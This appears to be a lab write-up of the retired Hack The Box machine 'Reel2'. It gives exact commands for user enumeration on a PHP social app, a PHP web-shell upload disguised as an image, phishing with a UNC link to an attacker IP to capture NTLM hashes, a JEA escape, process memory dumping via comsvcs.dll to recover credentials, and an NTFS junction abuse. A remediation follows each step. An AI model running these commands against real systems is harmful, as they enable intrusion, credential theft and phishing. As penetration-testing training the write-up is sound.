Reel2
Summary
Target [REDACTED: recovered credential] ($TARGET) is a Windows Server 2012 R2 Active Directory host running Microsoft Exchange OWA on port 443 and a 'Wallstant' PHP social-network application on port 8080, with WinRM on port 5985. My self-registered on Wallstant and queried its search endpoint with no search term to dump every registered user's full name, then scraped a post by user 'sven' that referenced 'Summer 2020' as a password hint.
After generating AD username candidates with username-anarchy, the Exchange Global Address List was harvested via MailSniper and a spear-phishing email containing a UNC link was sent to all mailboxes; Responder captured htb\k.svensson's Net-NTLMv2 hash, which was cracked offline to '[REDACTED: recovered credential]'. WinRM gave a shell locked in a JEA ConstrainedLanguage runspace exposing only eight cmdlets; the restriction was bypassed by shadowing a whitelisted cmdlet name with a custom PowerShell function, yielding full arbitrary command execution.
Three Sticky Notes (Electron v0.3.0) processes running in k.svensson's context were memory-dumped via the Windows-native comsvcs.dll MiniDump technique, and the application's LevelDB log exposed the plaintext credential '[REDACTED: recovered credential][REDACTED: recovered credential]'. A named JEA endpoint tied to [REDACTED: recovered credential] was configured to run as a virtual administrator and exposed a custom Check-File cmdlet for reading arbitrary file paths; an NTFS directory junction created from the k.svensson session at C:\ProgramData\admin pointing to C:\Users\Administrator caused Check-File to return the Administrator's root flag with SYSTEM-equivalent rights, completing the full compromise.
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export ATTACKER_IP="<your-vpn-address>"
export PASSWORD="<a-password-you-choose>"
export PASSWORD2="<a-password-you-choose>"
export PASSWORD3="<a-password-you-choose>"
export PASSWORD4="<a-password-you-choose>"Attack path — how the box was taken
Exact commands 3
nmap -sV -sC -p 80,443,5985,6001,6002,6004,8080 --open -oA reel2_scan $TARGETcurl -sSk https://$TARGET/owa/auth/logon.aspx -Icurl -s http://$TARGET:8080/Exact commands 2
curl -s -b 'PHPSESSID=<your_session>' "http://$TARGET:8080/search" | grep -oP '(?<=>)[A-Za-z ]+(?=<)' | sort -uusername-anarchy --input-file fullnames.txt --select-format first,first.last,f.last,flast > htb_candidates.txtFixRequire a minimum search term and enforce result-count limits on the Wallstant search endpointHigh
Exact commands 3
curl -s -b 'PHPSESSID=<your_session>' "http://$TARGET:8080/fetch_posts_user.php?rid=<sven_user_id>" | grep -i 'summer\|2020\|password'printf 'GIF89a\n<?php if(isset($_GET["c"])){system($_GET["c"]);}?>' > shell.jpg && curl -s -b 'PHPSESSID=<your_session>' -F 'img=@shell.jpg' http://$TARGET:8080/profile_update.phpcurl -s "http://$TARGET:8080/imgs/user_imgs/shell.jpg?c=whoami"FixBlock PHP execution in upload directories and validate files by content, not extensionCritical
Exact commands 4
sudo responder -I tun0 -wvImport-Module MailSniper.ps1; Get-GlobalAddressList -ExchHostname $TARGET -UserName s.svensson -Password $PASSWORD3 -OutFile gal.txtImport-Module MailSniper.ps1; Send-GlobalAddressListSpray -ExchHostname $TARGET -UserName s.svensson -Password $PASSWORD3 -Recipients gal.txt -Subject 'Action Required' -Body '<img src="\\\\$ATTACKER_IP\\share\\img.png">'john --wordlist=/usr/share/wordlists/rockyou.txt k_svensson.ntlmv2FixBlock outbound NTLM from mail clients and enforce phishing-resistant MFA on ExchangeCritical
Exact commands 4
nxc winrm $TARGET -d HTB -u k.svensson -p '$PASSWORD4' -x 'whoami; hostname'evil-winrm -i $TARGET -u 'HTB\k.svensson' -p '$PASSWORD4'function Get-Command { whoami }; Get-Commandtype C:\Users\k.svensson\Desktop\user.txtFixEnforce machine-level Constrained Language mode via WDAC to prevent JEA bypassHigh
Exact commands 5
Get-Process stickynotes | Select-Object Id, Name, Pathrundll32 C:\Windows\System32\comsvcs.dll,MiniDump 3512 C:\Users\k.svensson\sn_3512.dmp full
rundll32 C:\Windows\System32\comsvcs.dll,MiniDump 5716 C:\Users\k.svensson\sn_5716.dmp full
rundll32 C:\Windows\System32\comsvcs.dll,MiniDump 6064 C:\Users\k.svensson\sn_6064.dmp fullSelect-String -Path C:\Users\k.svensson\sn_*.dmp -Pattern 'jea|password|Ab!' -Encoding Bytetype "C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb\000003.log"nxc winrm $TARGET -d HTB -u $PASSWORD -p '$PASSWORD2'FixProhibit credential storage in Sticky Notes and enforce a secrets-management solutionCritical
Exact commands 4
dir C:\Users\k.svensson\Documents\*.pssc, C:\Users\k.svensson\Documents\*.psrcNew-Item -ItemType Junction -Path C:\ProgramData\admin -Target C:\Users\Administrator$cred = New-Object PSCredential("HTB\$PASSWORD",(ConvertTo-SecureString '$PASSWORD2' -AsPlainText -Force)); Enter-PSSession -ComputerName $TARGET -Credential $cred -ConfigurationName <jea_endpoint_name>Check-File -Path C:\ProgramData\admin\Desktop\root.txtFixRemove arbitrary file-read from the JEA endpoint and prevent low-privilege NTFS junction creationCritical
Attack patterns used
The transferable techniques behind this compromise.
Unrestricted File UploadWebT1505.003
What it is
An upload feature that doesn't properly validate file type/content lets an unauthorised user upload a server-side script (.php, .phtml, .jsp, .aspx) and then browse to it for code execution. Bypasses include double extensions, MIME spoofing, magic-byte tricks, and abusing permissive .htaccess.
Why it works
Validation is often done on the client or on an easily-spoofed extension/MIME rather than on content and storage location. Remediate by storing uploads outside the web root, randomizing names, enforcing an allow-list by content, and disabling execution in the upload directory.
Read more
Exposed services
| 80/tcp | http Microsoft IIS httpd 8.5 |
| 443/tcp | ssl/https? |
| 5985/tcp | http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |
| 6001/tcp | ncacn_http Microsoft Windows RPC over HTTP 1.0 |
| 6002/tcp | ncacn_http Microsoft Windows RPC over HTTP 1.0 |
| 6004/tcp | ncacn_http Microsoft Windows RPC over HTTP 1.0 |
| 6005/tcp | msrpc Microsoft Windows RPC |
| 6006/tcp | msrpc Microsoft Windows RPC |
| 6007/tcp | msrpc Microsoft Windows RPC |
| 6008/tcp | msrpc Microsoft Windows RPC |
| 6010/tcp | ncacn_http Microsoft Windows RPC over HTTP 1.0 |
| 6011/tcp | msrpc Microsoft Windows RPC |
| 6012/tcp | msrpc Microsoft Windows RPC |
| 6165/tcp | msrpc Microsoft Windows RPC |
| 8080/tcp | http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32) |